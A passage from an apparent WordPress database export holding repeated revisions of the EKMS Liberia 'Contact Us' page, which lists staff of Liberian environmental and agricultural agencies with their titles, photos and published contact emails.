alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p><p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:27:37','2021-03-24 11:27:37','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3622,42,'2021-03-24 11:28:14','2021-03-24 11:28:14','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p><p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p><p><strong>Henry A. Simpson </strong><br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-03-24 11:28:14','2021-03-24 11:28:14','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3623,42,'2021-03-24 11:28:15','2021-03-24 11:28:15','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a 